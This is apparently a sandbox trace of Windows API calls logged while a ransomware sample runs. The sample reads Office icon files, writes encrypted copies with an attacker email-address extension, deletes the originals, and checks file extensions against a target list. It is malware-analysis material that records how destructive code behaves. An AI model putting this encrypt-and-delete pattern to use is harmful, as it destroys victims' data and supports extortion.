	[0163.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitems.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0163.711] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2998) returned 1
	[0163.711] CloseHandle (hObject=0x3b8) returned 1
	[0163.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitems.ico")) returned 0x20
	[0163.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitems.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitems.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0163.711] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.712] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitems.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0163.712] GetLastError () returned 0x0
	[0163.712] ReadFile (in: hFile=0x3b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0163.795] WriteFile (in: hFile=0x3a8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0163.796] ReadFile (in: hFile=0x3b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.796] WriteFile (in: hFile=0x3a8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.796] SetEndOfFile (hFile=0x3a8) returned 1
	[0163.797] CloseHandle (hObject=0x3a8) returned 1
	[0163.797] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.797] SetEndOfFile (hFile=0x3b8) returned 1
	[0163.799] CloseHandle (hObject=0x3b8) returned 1
	[0163.799] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.847] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitems.ico")) returned 1
	[0163.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.921] lstrlenW (lpString=".doc") returned 4
	[0163.921] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.921] lstrlenW (lpString=".docx") returned 5
	[0163.921] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.921] lstrlenW (lpString=".pdf") returned 4
	[0163.921] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.921] lstrlenW (lpString=".xls") returned 4
	[0163.921] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.921] lstrlenW (lpString=".xlsx") returned 5
	[0163.921] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.921] lstrlenW (lpString=".ppt") returned 4
	[0163.921] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.921] lstrlenW (lpString=".zip") returned 4
	[0163.921] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.921] lstrlenW (lpString=".rar") returned 4
	[0163.921] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.921] lstrlenW (lpString=".bz2") returned 4
	[0163.921] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.921] lstrlenW (lpString=".7z") returned 3
	[0163.921] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.922] lstrlenW (lpString=".dbf") returned 4
	[0163.922] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.922] lstrlenW (lpString=".1cd") returned 4
	[0163.922] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.922] lstrlenW (lpString=".jpg") returned 4
	[0163.922] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.922] lstrlenW (lpString=".doc") returned 4
	[0163.922] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.922] lstrlenW (lpString=".docx") returned 5
	[0163.922] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.922] lstrlenW (lpString=".pdf") returned 4
	[0163.922] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.922] lstrlenW (lpString=".xls") returned 4
	[0163.922] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.922] lstrlenW (lpString=".xlsx") returned 5
	[0163.922] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.922] lstrlenW (lpString=".ppt") returned 4
	[0163.922] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.922] lstrlenW (lpString=".zip") returned 4
	[0163.922] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.922] lstrlenW (lpString=".rar") returned 4
	[0163.922] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.922] lstrlenW (lpString=".bz2") returned 4
	[0163.922] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.922] lstrlenW (lpString=".7z") returned 3
	[0163.922] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.922] lstrlenW (lpString=".dbf") returned 4
	[0163.922] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.923] lstrlenW (lpString=".1cd") returned 4
	[0163.923] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO") returned 66
	[0163.923] lstrlenW (lpString=".jpg") returned 4
	[0163.923] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.923] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.923] lstrlenW (lpString="SCDRESTL.ICO") returned 12
	[0163.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrestl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.923] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1078) returned 1
	[0163.923] CloseHandle (hObject=0x25c) returned 1
	[0163.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrestl.ico")) returned 0x20
	[0163.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrestl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrestl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.924] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.924] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrestl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0163.925] GetLastError () returned 0x0
	[0163.925] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x436, lpOverlapped=0x0) returned 1
	[0163.927] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0163.928] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.928] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.928] SetEndOfFile (hFile=0x3f0) returned 1
	[0163.928] CloseHandle (hObject=0x3f0) returned 1
	[0163.928] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.928] SetEndOfFile (hFile=0x25c) returned 1
	[0163.930] CloseHandle (hObject=0x25c) returned 1
	[0163.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.930] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrestl.ico")) returned 1
	[0163.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.931] lstrlenW (lpString=".doc") returned 4
	[0163.931] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.931] lstrlenW (lpString=".docx") returned 5
	[0163.931] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.931] lstrlenW (lpString=".pdf") returned 4
	[0163.931] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.931] lstrlenW (lpString=".xls") returned 4
	[0163.931] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.931] lstrlenW (lpString=".xlsx") returned 5
	[0163.931] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.931] lstrlenW (lpString=".ppt") returned 4
	[0163.931] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.931] lstrlenW (lpString=".zip") returned 4
	[0163.931] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.931] lstrlenW (lpString=".rar") returned 4
	[0163.931] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.932] lstrlenW (lpString=".bz2") returned 4
	[0163.932] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.932] lstrlenW (lpString=".7z") returned 3
	[0163.932] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.932] lstrlenW (lpString=".dbf") returned 4
	[0163.932] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.932] lstrlenW (lpString=".1cd") returned 4
	[0163.932] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.932] lstrlenW (lpString=".jpg") returned 4
	[0163.932] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.932] lstrlenW (lpString=".doc") returned 4
	[0163.932] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.932] lstrlenW (lpString=".docx") returned 5
	[0163.932] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.932] lstrlenW (lpString=".pdf") returned 4
	[0163.932] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.932] lstrlenW (lpString=".xls") returned 4
	[0163.932] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.932] lstrlenW (lpString=".xlsx") returned 5
	[0163.932] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.932] lstrlenW (lpString=".ppt") returned 4
	[0163.932] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.933] lstrlenW (lpString=".zip") returned 4
	[0163.933] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.933] lstrlenW (lpString=".rar") returned 4
	[0163.933] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.933] lstrlenW (lpString=".bz2") returned 4
	[0163.933] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.933] lstrlenW (lpString=".7z") returned 3
	[0163.933] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.933] lstrlenW (lpString=".dbf") returned 4
	[0163.933] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.933] lstrlenW (lpString=".1cd") returned 4
	[0163.933] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO") returned 66
	[0163.935] lstrlenW (lpString=".jpg") returned 4
	[0163.935] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.935] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.935] lstrlenW (lpString="SCDRESTS.ICO") returned 12
	[0163.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrests.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.936] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2998) returned 1
	[0163.936] CloseHandle (hObject=0x25c) returned 1
	[0163.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrests.ico")) returned 0x20
	[0163.937] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrests.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrests.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.937] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.937] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrests.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0163.938] GetLastError () returned 0x0
	[0163.938] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0163.939] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0163.940] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.940] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.940] SetEndOfFile (hFile=0x3f0) returned 1
	[0163.940] CloseHandle (hObject=0x3f0) returned 1
	[0163.940] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.940] SetEndOfFile (hFile=0x25c) returned 1
	[0163.942] CloseHandle (hObject=0x25c) returned 1
	[0163.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.943] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrests.ico")) returned 1
	[0163.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.943] lstrlenW (lpString=".doc") returned 4
	[0163.943] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.943] lstrlenW (lpString=".docx") returned 5
	[0163.943] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.944] lstrlenW (lpString=".pdf") returned 4
	[0163.944] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.944] lstrlenW (lpString=".xls") returned 4
	[0163.944] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.944] lstrlenW (lpString=".xlsx") returned 5
	[0163.944] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.944] lstrlenW (lpString=".ppt") returned 4
	[0163.944] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.944] lstrlenW (lpString=".zip") returned 4
	[0163.944] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.944] lstrlenW (lpString=".rar") returned 4
	[0163.944] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.944] lstrlenW (lpString=".bz2") returned 4
	[0163.944] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.944] lstrlenW (lpString=".7z") returned 3
	[0163.944] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.944] lstrlenW (lpString=".dbf") returned 4
	[0163.944] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.944] lstrlenW (lpString=".1cd") returned 4
	[0163.944] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.944] lstrlenW (lpString=".jpg") returned 4
	[0163.944] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.944] lstrlenW (lpString=".doc") returned 4
	[0163.944] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.944] lstrlenW (lpString=".docx") returned 5
	[0163.944] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.944] lstrlenW (lpString=".pdf") returned 4
	[0163.944] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.945] lstrlenW (lpString=".xls") returned 4
	[0163.945] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.945] lstrlenW (lpString=".xlsx") returned 5
	[0163.945] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.945] lstrlenW (lpString=".ppt") returned 4
	[0163.945] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.945] lstrlenW (lpString=".zip") returned 4
	[0163.945] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.945] lstrlenW (lpString=".rar") returned 4
	[0163.945] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.945] lstrlenW (lpString=".bz2") returned 4
	[0163.945] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.945] lstrlenW (lpString=".7z") returned 3
	[0163.945] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.945] lstrlenW (lpString=".dbf") returned 4
	[0163.945] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.945] lstrlenW (lpString=".1cd") returned 4
	[0163.945] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO") returned 66
	[0163.945] lstrlenW (lpString=".jpg") returned 4
	[0163.945] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.945] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0163.945] lstrlenW (lpString="SCHDCNCL.CFG") returned 12
